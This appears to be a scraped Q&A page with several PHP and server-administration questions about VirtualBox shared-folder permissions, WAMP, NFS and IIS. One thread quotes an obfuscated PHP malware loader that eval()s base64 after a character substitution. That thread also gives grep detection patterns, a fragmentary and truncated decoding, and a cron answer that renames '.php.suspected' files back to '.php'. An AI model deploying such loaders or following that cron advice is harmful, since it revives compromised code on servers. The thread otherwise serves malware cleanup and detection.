How to change PHP-User/Group from Root|Root to Nobody|Nogroup? - php

We have a Local-Server that runs Ubuntu 15 LTS (Virtual-Host-System).
We use VirtualBox as VM-Software.
We have many Virtualservers in Virtualbox (Virtual-Guest-System).
All of these VM-Servers run Ubuntu-Server 16 LTS (with PHP (5.3,5.6,7), Apache, and so on).
For the different Php-Versions we use:
https://launchpad.net/~ondrej/+archive/ubuntu/php/
Each Server has only one Php-Version running.
Php executed by apache mod = a2enmod php5.6
On the Virtual-Host-System we have ONE shared Folder (/media/daten/server) with all Web-Server-Folders (for the different VM-Guest-Servers).
Each VM-Guest-Server has this folder including as (/media/sf_server) -> with VM-Guest-Additions
Our employees use Windows (7 and 10). All employees include the Serverfolder as a Networkfolder. If an employee copies and pastes files to the Server-Directory, all the files automatically get USER: nobody | Group: nogroup.
This is the reason why we configured Apache as USER: nobody | Group: nogroup (/etc/apache2/envvars). That works fine. Apache can run/write/delete all files without any problems.
But when we use a phpscript for upload/upgrade (upload, wordpress, typo3) then these uploaded-files get User: Root | Group: User
echo exec('whoami'); = nobody |
echo get_current_user(); = root
Ftp is not running on the VM's.
All Scripts started from Webbrowser/Php/Apache2.
Example 1:
Default Wordpress Updatescript can't create a wp-config-sample.php
(updates without ftp - FS_METHOD: direct)
Example 2:
Typo3 upload an image:
Uploaded file could not be moved! Write-permission problem in "fileadmin/img/"?
How can we run all PHP-Tasks (Upload, etc) as USER: nobody | Group: nogroup???
Or what is the best/secure way to make this solution working??
thanks a lot

When using TYPO3, you can configure which group should be set for created or uploaded files. You have to set the following configuration variable.
$GLOBALS['TYPO3_CONF_VARS']['BE']['createGroup'] = 'nogroup';
However, this only works for uploads that are actually handled by the TYPO3 api. Have a look at
\TYPO3\CMS\Core\Utility\GeneralUtility::upload_copy_move()
to get an impression on how TYPO3 handles file uploads.

Related

is_readable() returns false while require_once returns true

I get false whenever I use the function is_readable on a file shared by my host on a VM, the expected result is true.
I am doing the setup of a local development environment for an existing project. I don't want to use another function because it's a complex legacy system and I am afraid I would hide other potential problems I would stumble upon later in development.
The VM is set up using vagrant and virtualbox. The OS is a Windows Server 2008 machine with Zend Server with PHP 5.3 hosting code shared on the host, which is a Mac.
The shared folder is created as follows:
vmConfig.vm.synced_folder "/path/to/shared/folder/cms", '/cms', mount_options: ["dmode=775,fmode=664,type=smb"], owner: 'wcmadmin', group: 'wcmadmin'
A piece of code is trying to see if a file is readable. is_readable returns false. I run the script via command line with both users wcmadmin and Administrator and I get the same results.
function smarty_core_assemble_plugin_filepath($params, &$smarty)
{
[...]
// try relative to cwd (or absolute)
if (is_readable($_plugin_filepath)) {
$_return = $_plugin_filepath;
break;
}
[...]
I did a test script to dig further:
echo 'is_readable: ';
var_export(is_readable('C:\cms\path\to\file\file.php'));
echo "\n";
echo 'require_once: ';
var_export(require_once('C:\cms\path\to\file\file.php'));
And I have the following results:
is_readable: false
require_once: true
Using file_get_contents on the file returns the content correctly.
Using cygwin, the permissions on the file are as follows:
$ ls -al C:\cms\path\to\file\file.php
-rw-r--r-- 1 wcmadmin None 1498 Apr 18 07:22 C:\cms\path\to\file\file.php
Files path have been changed for the purpose of this question. While they may have some discrepancies, they resolve correctly during real tests.
It's a bug in virtual box and is still happening as of version 5.0.18.
See:
https://www.virtualbox.org/ticket/11675

How to fix WAMP page access when using IP Address instead of localhost in the URL

I have recently built my local test server WAMP by using Windows 7 Pro 64bit OS. I have also chosen to use the 32bit programs (Apache, MySQL & PHP) so my WAMP spec would be x86 V11 binary Thread Safe (TS). I want to keep all development related items into the C:\dev folder or directory, so my file system looks like this:
C:\dev\bin\apache24\
C:\dev\bin\MySQL5.6\
C:\dev\bin\PHP5.6\
C:\dev\www\phpMysqlAdmin
C:\dev\www\HollyGhost.com\login.php
Settings: my.ini
# Path to the installation directory.
basedir = "C:/dev/bin/MySQL5.6/"
# Path to the database data directory
datadir = "C:/dev/bin/MySQL5.6/data/"
# The TCP/IP Port the MySQL Server will listen on
port = 3306
# Server Id.
server_id = 1
C:\Windows\System32\drivers\etc\hosts
127.0.0.1 localhost
If I need to view the web site: http://localhost/HollyGhost.com/login.php the site comes up without any issues and works great; but if I rewrite the URL on the same box to: http://127.0.0.1/HollyGhost.com/login.php the site renders the login page but I cannot log into the system. All I am getting when I attempt to log in is the login page keeps refreshing. I tried to do the same from another PC and I am getting the same result. I need to do this so I can test other devices locally.
Any help is greatly appreciated. I am not sure if this issue is a permission problem based on the fact that MySQL data is stored in the \MySQl5.6\data directory. If so, how do I go about fixing it.
The problem was in the Windows Firewall -> Advanced settings -> Inbound Rules. The Inbound Rules for MySQL Profile was set to Private and the Program was set to Any. I changed Profile to "Domain, Private" and set Program to point to MySQL installation directory "MySQL.exe"; this works for me after rebooting all network devices and PCs.

php file automatically renamed to php.suspected

Since last 4 days, we are facing strange issue on our Production server (AWS EC2 instance) specific to only one site which is SugarCRM.
Issue is /home/site_folder/public_html/include/MassUpdate.php file is renamed automatically to /home/site_folder/public_html/include/MassUpdate.php.suspected
This happens 2-3 times in a day with 3-4 hours of gap. This issue occurs only in case of specific site, even it doesn't occur for staging replica of the same site. I even checked code of that file from both sites, it's same.
We have Googled and found, such issue occurs mostly for Wordpress sites and it could be because of attack. But we checked our server against the attack, there isn't any. Also there is no virus/malware scan running on server.
What should we do?
Update:
We found few things after going through this link
We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ And found that there are few files with following sample code.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
Seems some malware, how we go about removing it permanently?
Thanks
The renaming of .php files to .php.suspected keeps happening today. The following commands should not come up with something:
find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print
In my case, the infected files could be located with the following commands:
cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*#include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'
I have prepared a longer description of the problem and how to deal with it at GitHub.
It's somewhat obfuscated, but I've de-obfuscated it. The function flnftovr takes a string and an array as arguments. It creates a new string $ggy using the formula
isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
It then prepends base64_decode to the string.
The string is $s, the array is $koicev. It then evals the result of this manipulation. So eventually a string gets created:
base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)
So what actually gets run on your server is:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
If you didn't create this and you suspect your site has been hacked, I'd suggest you wipe the server, and create a new installation of whatever apps are running on your server.
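Added example, not part of any answer on this page: a static decoder for the substitution-plus-base64 wrapper described above, written in Python so the payload can be read without ever being passed to eval. The sample file, its two-entry map and the function names are constructed for illustration; the sample decodes to the first statement of the output quoted above.

```python
import base64
import re

# Constructed sample in the same shape as the file quoted in the question:
# a substituted base64 string, a character map, and an eval() of the result.
SAMPLE = r"""<?php
function f($a, $b){$r = ''; /* substitution loop elided */ return $r;}
$s = 'VGluaQ9zZXVoJ2Qycm9y'.
'X2xvZycsIE5QTEwp';
$m = Array('Q'=>'V', 'V'=>'Q');
eval(f($s, $m));?>"""

# $var = 'literal' . 'literal' ... ;   (single-quoted, '.'-concatenated)
STR_ASSIGN = re.compile(r"\$\w+\s*=\s*((?:'[^']*'\s*\.?\s*)+);")
# $var = Array('x'=>'y', ...);
MAP_ASSIGN = re.compile(r"\$\w+\s*=\s*Array\((.*?)\);", re.S | re.I)
MAP_PAIR = re.compile(r"'(.)'\s*=>\s*'(.)'")


def extract(php_source):
    """Return (encoded_string, char_map) parsed from the PHP text."""
    strings = ["".join(re.findall(r"'([^']*)'", m.group(1)))
               for m in STR_ASSIGN.finditer(php_source)]
    map_match = MAP_ASSIGN.search(php_source)
    if not strings or not map_match:
        raise ValueError("wrapper pattern not found")
    # Helper variables such as $r = '' also match; the payload is the longest.
    encoded = max(strings, key=len)
    char_map = dict(MAP_PAIR.findall(map_match.group(1)))
    return encoded, char_map


def decode(php_source):
    """Undo the substitution, then base64-decode. Nothing is executed."""
    encoded, char_map = extract(php_source)
    # Same rule as the PHP loop: mapped characters are replaced, others kept.
    b64 = "".join(char_map.get(ch, ch) for ch in encoded)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    return base64.b64decode(b64)


if __name__ == "__main__":
    print(decode(SAMPLE).decode("utf-8", errors="replace"))
```

Run it against a copy of the suspect file on an analysis machine, not on the web server, and keep the decoded text with the incident notes.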
Renaming php files to php.suspected is usually intended and done by hacker's script. They change file extension to give the impression that the file was checked by some antimalware software, is secure and can't be executed. But, in fact, isn't. They change extension to "php" anytime they want to invoke the script and after it, they change the extension back to "suspected".
You can read about it on Sucuri Research Labs
Maybe this post is old but the topic is still alive. Especially according to June 2019 malware campaign targeting WordPress plugins. I found a few "suspected" files in my client's WordPress subdirectories (e.g. wp-content)
Posting this answer, it may help others.
Create a file with '.sh' extension at your convenient location.
Add following code in it.
#Rename your_file_name.php.suspected to your_file_name.php
mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
Save this file.
Set cron for every 10 minutes (or whatever interval you need), using following line in crontab
*/10 * * * * path_to_cron_file.sh
Restart crontab service.
You will get a lot of documentation on creating cron on Google.

NFS doesn't sync files if characters are modified in a file

I'm having a strange problem with my vagrant setup: changing characters in a file and saving it doesn't reflect the change in the vm. But if I add/remove some characters or add in a few blank lines, everything works fine.
I have already checked if I have opcache enabled on my PHP5.5 and "php -i | grep opcache" get any result ... so I imagine it's no.
Already tested too another vagrant (1.7.2) version, same result.
My configuration is :
Windows 7 Pro
Vagrant 1.6.3 with plugin WinNFSd
VirtualBox 4.3.12
Centos6.5 Box
PHP 5.5.19
Apache 2.4.10
PhpStorm 8 (but problem is same with SublimeText 3 and Notepad++)
Here is a video of a test from me for show you the problem :
https://www.dropbox.com/s/k70fiwfw6mopjs7/2015-03-24%2020-47-07.mp4?dl=0
Two weeks I work on this problem, it will make me crazy ...
I already tried Rsync and Samba or default vagrant synch folder but it doesn't meet my needs.
I really appreciate your help guys!
The problem on sublime was atomic_save setting being true. Not sure if there is an equivalent setting for PHPStorm/Notepad++
https://github.com/mitchellh/vagrant/issues/3888

Setting permission for PHP (or I_USER [I'm not sure here...]) to connect to iisweb.vbs

I have been trying to figure out a way to manage our domains at work and easily created a SimpleDNS class, but now I'm on the IIS Server Administration side of it and I'm just lost on what is going on.
Here is the PHP code I am running to test it.
<?php
$cmd = 'iisweb /create c:\websites\examplesite.com\www "Example Domain!" /d www.examplesite.com';
exec($cmd,$data);
print_r($data);
?>
But when I run it I get:
Array ( [0] => Error &H80041003: Access denied
I am completely stumped on how to set up permissions for this.
Here's the good part! When I run <?php exec('ping google.com',$data);?>: it works seamlessly.
I have no idea where to start when it comes to setting up the permissions for iisweb.vbs (the iisweb vbs file). I don't even know if I'm supposed to set up permissions on that file. I don't know if I'm supposed to setup a CGI option in the console. I'm lost.
Can someone help me out? What am I doing here?
Your code will be running under one of two identities:
1. The identity of the Application Pool that the website runs in (NETWORK SERVICE for example if the defaults were used). You can find this out by opening the property window for an application pool and selecting the Identity tab.
2. The identity of the website anonymous user, which you can find in Website Properties -> Directory Security -> Authentication and access control (click the edit button).
FastCGI
If you're running PHP under FastCGI and the c:\php\php.ini configuration value fastcgi.impersonate = 1 then the user identity will be the site anonymous user (option 2 above). If fastcgi.impersonate = 0 then PHP scripts will execute under the identity of the application pool (option 1).
You can tell if PHP is configured to execute under FastCGI by looking at the .php scriptmap for the site (Website Properties -> Home Directory -> Configuration -> Application Extensions). If it's set to C:\WINDOWS\system32\inetsrv\fcgiext.dll then you're running FastCGI.
No FastCGI
If your .php script map is not configured to use C:\WINDOWS\system32\inetsrv\fcgiext.dll
then scripts will run under the identity of the site anonymous user (option 2 above).
In all cases the account used must have Administrators rights to be able to run the IIS admin scripts.
